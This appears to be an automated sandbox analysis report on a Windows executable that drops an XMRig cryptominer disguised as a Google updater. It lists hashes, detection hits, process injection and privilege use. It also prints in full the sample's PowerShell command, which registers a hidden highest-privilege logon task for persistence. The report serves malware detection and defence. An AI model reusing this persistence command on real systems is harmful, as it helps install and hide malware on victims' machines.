Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
27/10/2024, 15:34
Static task
static1
Behavioral task
behavioral1
Sample
3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
Resource
win7-20240903-en
General
-
Target
3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
-
Size
9.8MB
-
MD5
6f804d98df32ee28685d8468e619dd87
-
SHA1
cc4813865c1600e7c7b772d692a37dd752a7cc6a
-
SHA256
3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa
-
SHA512
af1280f4db7b70f9a94f20837258a5a6ca7cbbe1a4cc44d0b938a10290496802793d631e4cce155597dfc05243624013750310a2baf260c085f29316682d37c4
-
SSDEEP
196608:NfZ+pJEfu095vo5n8xnzv0jr+ao/hNJu+y19RERUAc9s:Nsx09xo5m70nm5NJuVRERUAY
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 5100 created 3544 5100 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe 56 PID 5100 created 3544 5100 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe 56 PID 3772 created 3544 3772 uwpdater.exe 56 PID 3772 created 3544 3772 uwpdater.exe 56 PID 3772 created 3544 3772 uwpdater.exe 56 -
Xmrig family
-
XMRig Miner payload 15 IoCs
resource yara_rule behavioral2/memory/3772-41-0x00007FF747B80000-0x00007FF748549000-memory.dmp xmrig behavioral2/memory/1628-44-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp xmrig behavioral2/memory/1628-46-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp xmrig behavioral2/memory/1628-48-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp xmrig behavioral2/memory/1628-50-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp xmrig behavioral2/memory/1628-52-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp xmrig behavioral2/memory/1628-54-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp xmrig behavioral2/memory/1628-56-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp xmrig behavioral2/memory/1628-58-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp xmrig behavioral2/memory/1628-60-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp xmrig behavioral2/memory/1628-62-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp xmrig behavioral2/memory/1628-64-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp xmrig behavioral2/memory/1628-66-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp xmrig behavioral2/memory/1628-68-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp xmrig behavioral2/memory/1628-70-0x00007FF7C1660000-0x00007FF7C1E4F000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 3772 uwpdater.exe -
pid Process 2972 powershell.exe 1860 powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3772 set thread context of 4140 3772 uwpdater.exe 104 PID 3772 set thread context of 1628 3772 uwpdater.exe 105 -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 5100 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe 5100 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe 2972 powershell.exe 2972 powershell.exe 5100 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe 5100 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe 3772 uwpdater.exe 3772 uwpdater.exe 1860 powershell.exe 1860 powershell.exe 3772 uwpdater.exe 3772 uwpdater.exe 3772 uwpdater.exe 3772 uwpdater.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2972 powershell.exe Token: SeIncreaseQuotaPrivilege 2972 powershell.exe Token: SeSecurityPrivilege 2972 powershell.exe Token: SeTakeOwnershipPrivilege 2972 powershell.exe Token: SeLoadDriverPrivilege 2972 powershell.exe Token: SeSystemProfilePrivilege 2972 powershell.exe Token: SeSystemtimePrivilege 2972 powershell.exe Token: SeProfSingleProcessPrivilege 2972 powershell.exe Token: SeIncBasePriorityPrivilege 2972 powershell.exe Token: SeCreatePagefilePrivilege 2972 powershell.exe Token: SeBackupPrivilege 2972 powershell.exe Token: SeRestorePrivilege 2972 powershell.exe Token: SeShutdownPrivilege 2972 powershell.exe Token: SeDebugPrivilege 2972 powershell.exe Token: SeSystemEnvironmentPrivilege 2972 powershell.exe Token: SeRemoteShutdownPrivilege 2972 powershell.exe Token: SeUndockPrivilege 2972 powershell.exe Token: SeManageVolumePrivilege 2972 powershell.exe Token: 33 2972 powershell.exe Token: 34 2972 powershell.exe Token: 35 2972 powershell.exe Token: 36 2972 powershell.exe Token: SeIncreaseQuotaPrivilege 2972 powershell.exe Token: SeSecurityPrivilege 2972 powershell.exe Token: SeTakeOwnershipPrivilege 2972 powershell.exe Token: SeLoadDriverPrivilege 2972 powershell.exe Token: SeSystemProfilePrivilege 2972 powershell.exe Token: SeSystemtimePrivilege 2972 powershell.exe Token: SeProfSingleProcessPrivilege 2972 powershell.exe Token: SeIncBasePriorityPrivilege 2972 powershell.exe Token: SeCreatePagefilePrivilege 2972 powershell.exe Token: SeBackupPrivilege 2972 powershell.exe Token: SeRestorePrivilege 2972 powershell.exe Token: SeShutdownPrivilege 2972 powershell.exe Token: SeDebugPrivilege 2972 powershell.exe Token: SeSystemEnvironmentPrivilege 2972 powershell.exe Token: SeRemoteShutdownPrivilege 2972 powershell.exe Token: SeUndockPrivilege 2972 powershell.exe Token: SeManageVolumePrivilege 2972 powershell.exe Token: 33 2972 powershell.exe Token: 34 2972 powershell.exe Token: 35 2972 powershell.exe Token: 36 2972 powershell.exe Token: SeIncreaseQuotaPrivilege 2972 powershell.exe Token: SeSecurityPrivilege 2972 powershell.exe Token: SeTakeOwnershipPrivilege 2972 powershell.exe Token: SeLoadDriverPrivilege 2972 powershell.exe Token: SeSystemProfilePrivilege 2972 powershell.exe Token: SeSystemtimePrivilege 2972 powershell.exe Token: SeProfSingleProcessPrivilege 2972 powershell.exe Token: SeIncBasePriorityPrivilege 2972 powershell.exe Token: SeCreatePagefilePrivilege 2972 powershell.exe Token: SeBackupPrivilege 2972 powershell.exe Token: SeRestorePrivilege 2972 powershell.exe Token: SeShutdownPrivilege 2972 powershell.exe Token: SeDebugPrivilege 2972 powershell.exe Token: SeSystemEnvironmentPrivilege 2972 powershell.exe Token: SeRemoteShutdownPrivilege 2972 powershell.exe Token: SeUndockPrivilege 2972 powershell.exe Token: SeManageVolumePrivilege 2972 powershell.exe Token: 33 2972 powershell.exe Token: 34 2972 powershell.exe Token: 35 2972 powershell.exe Token: 36 2972 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe 1628 explorer.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3772 wrote to memory of 4140 3772 uwpdater.exe 104 PID 3772 wrote to memory of 1628 3772 uwpdater.exe 105 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3544
-
C:\Users\Admin\AppData\Local\Temp\3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe"C:\Users\Admin\AppData\Local\Temp\3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:5100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wczaqphd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTwaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTwaskMachineQC' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTwaskMachineQC"2⤵PID:3012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wczaqphd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTwaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTwaskMachineQC' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1860
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:4140
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1628
-
-
C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exeC:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3772
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5c95fe14a860e918a98d24f0f368b1c43
SHA169c8cdb324ffa35c638a9ca9e4231375af22a380
SHA256b611743d7be3e9f89db1d97a71ed2ee2efcc02df0d824078ff7be6f78a0bb7f3
SHA5126e8dcf392ebdab756016c82db7aa3bd920b26eb18b049d4d2980101bc34bf2d096003168c9853997e1d0683575668050c485acacf1fce8cb6054e8fc018b7fef
-
Filesize
1KB
MD541cef186d2a39342aa7c2ea5d68be3db
SHA16dae6036aa50b0b7ea4167cafd6942f40dbcd582
SHA25636c3843d76c1bdbf139301f7a9ad852fa507341445e394d14415c388b6dafe37
SHA5127151b1f2feeac776efface71c4f128bc1eec2873ad87d851b44d3f7d987cd0fe8f82fc7eaa571a5ef0d55f8378959dab055539ff1ff573a23d776f04e22b3f38
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9.8MB
MD56f804d98df32ee28685d8468e619dd87
SHA1cc4813865c1600e7c7b772d692a37dd752a7cc6a
SHA2563b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa
SHA512af1280f4db7b70f9a94f20837258a5a6ca7cbbe1a4cc44d0b938a10290496802793d631e4cce155597dfc05243624013750310a2baf260c085f29316682d37c4